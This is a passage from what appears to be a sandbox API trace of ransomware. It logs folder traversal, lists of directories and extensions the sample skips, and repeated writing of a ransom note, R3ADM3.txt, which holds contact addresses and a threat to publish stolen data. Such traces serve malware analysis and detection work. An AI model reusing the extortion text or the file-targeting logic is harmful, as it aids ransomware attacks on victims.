CloseHandle (hObject=0x6dc) returned 1 [0160.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.575] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x648c9750, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x648c9750, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.575] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.575] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x648c9750, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x648c9750, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.575] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.575] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.575] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf1a9e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf1a9e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0160.575] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0160.575] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0160.575] StrStrIW (lpFirst="Acrobat", lpSrch="tmp") returned 0x0 [0160.575] StrStrIW (lpFirst="Acrobat", lpSrch="winnt") returned 0x0 [0160.575] StrStrIW (lpFirst="Acrobat", lpSrch="temp") returned 0x0 [0160.575] StrStrIW (lpFirst="Acrobat", lpSrch="thumb") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="$Recycle.Bin") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="System Volume Information") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="Boot") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="Windows") returned 0x0 [0160.576] StrStrIW (lpFirst="Acrobat", lpSrch="Trend Micro") returned 0x0 [0160.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0160.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77964a8 [0160.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.576] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0160.576] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0160.576] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="tmp") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="winnt") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="temp") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="thumb") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="$Recycle.Bin") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="System Volume Information") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="Boot") returned 0x0 [0160.576] StrStrIW (lpFirst="ARM", lpSrch="Windows") returned 0x0 [0160.577] StrStrIW (lpFirst="ARM", lpSrch="Trend Micro") returned 0x0 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795340 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.577] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HelpCfg", cAlternateFileName="")) returned 1 [0160.577] lstrcmpW (lpString1="HelpCfg", lpString2=".") returned 1 [0160.577] lstrcmpW (lpString1="HelpCfg", lpString2="..") returned 1 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="tmp") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="winnt") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="temp") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="thumb") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="$Recycle.Bin") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="System Volume Information") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="Boot") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="Windows") returned 0x0 [0160.577] StrStrIW (lpFirst="HelpCfg", lpSrch="Trend Micro") returned 0x0 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795368 [0160.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796688 [0160.578] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.578] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x648c9750, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x648c9750, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x648c9750, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.578] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.578] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.578] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.578] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x648c9750, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x648c9750, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x648c9750, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0160.578] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0160.578] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0160.578] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.578] Sleep (dwMilliseconds=0x32) [0160.633] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0160.633] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0160.633] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0160.633] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0160.634] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.634] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.634] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.634] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.634] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0160.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\java\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.636] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.636] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.637] CloseHandle (hObject=0x6dc) returned 1 [0160.638] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.638] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0160.638] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x64961cd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64961cd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.638] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.638] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x64961cd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64961cd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.638] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.638] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.639] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80220580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 1 [0160.639] lstrcmpW (lpString1="Java Update", lpString2=".") returned 1 [0160.639] lstrcmpW (lpString1="Java Update", lpString2="..") returned 1 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="tmp") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="winnt") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="temp") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="thumb") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="$Recycle.Bin") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="System Volume Information") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="Boot") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="Windows") returned 0x0 [0160.639] StrStrIW (lpFirst="Java Update", lpSrch="Trend Micro") returned 0x0 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0160.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0160.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796700 [0160.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.639] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64961cd0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64961cd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64961cd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.639] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.640] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.640] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.640] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64961cd0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64961cd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64961cd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0160.640] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0160.640] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6808 | out: hHeap=0xea0000) returned 1 [0160.640] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.640] Sleep (dwMilliseconds=0x32) [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796778 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796868 [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6808 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0160.696] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796958 | out: hHeap=0xea0000) returned 1 [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.696] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6808 | out: hHeap=0xea0000) returned 1 [0160.696] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.697] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.697] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.699] CloseHandle (hObject=0x6dc) returned 1 [0160.699] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.699] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.699] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x649fa250, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x649fa250, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.699] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.699] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x649fa250, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x649fa250, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.700] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DAO", cAlternateFileName="")) returned 1 [0160.700] lstrcmpW (lpString1="DAO", lpString2=".") returned 1 [0160.700] lstrcmpW (lpString1="DAO", lpString2="..") returned 1 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="tmp") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="winnt") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="temp") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="thumb") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="$Recycle.Bin") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="System Volume Information") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="Boot") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="Windows") returned 0x0 [0160.700] StrStrIW (lpFirst="DAO", lpSrch="Trend Micro") returned 0x0 [0160.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6808 [0160.700] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0160.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.700] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60d54030, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0160.700] lstrcmpW (lpString1="Help", lpString2=".") returned 1 [0160.701] lstrcmpW (lpString1="Help", lpString2="..") returned 1 [0160.701] StrStrIW (lpFirst="Help", lpSrch="tmp") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="winnt") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="temp") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="thumb") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="$Recycle.Bin") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="System Volume Information") returned 0x0 [0160.701] 